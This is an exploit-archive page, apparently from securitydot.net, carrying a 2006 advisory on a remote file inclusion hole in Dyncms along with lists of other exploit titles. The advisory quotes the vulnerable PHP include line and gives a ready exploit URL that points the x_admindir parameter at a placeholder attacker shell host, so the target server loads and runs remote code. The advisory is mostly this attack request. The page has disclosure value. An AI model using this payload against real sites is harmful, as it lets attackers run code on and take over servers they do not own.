exploits , vulnerabilities , articles , Dyncms <= Release 6 (x_admindir) Remote File Include Vulnerability

2007-06-09 e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit
2007-05-22 TutorialCMS <= 1.01 Authentication Bypass Vulnerability
2007-04-16 audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
2007-04-14 bloofoxCMS 0.2.2 Cross Site Scripting
2007-04-14 Frogss CMS <= 0.7 Remote SQL Injection Exploit
2007-04-10 SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2006-09-02

Dyncms <= Release 6 (x_admindir) Remote File Include Vulnerability

Rated as : High Risk

#==============================================================================================
#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit
#===============================================================================================
#                                                                         

#Critical Level : Dangerous                                               

#                                                                         

#Venedor site : http://www.dyncms.com/          
#                                                                         

#Version : REleased                                                
#                                                            
#================================================================================================
#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php
#
#Vlu Code :
#--------------------------------
#    
include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.php");
#    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://SHELLURL.COM?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam
(coder-cruze-wolf) | cyper-worrior
==================================================================================================
securitydot.net - 2006-09-02

Exploits - newest 10 RSS | More

2007-06-15 57335 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34254 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42484 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29369 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19797 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16734 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19439 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16623 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33643 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17256 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit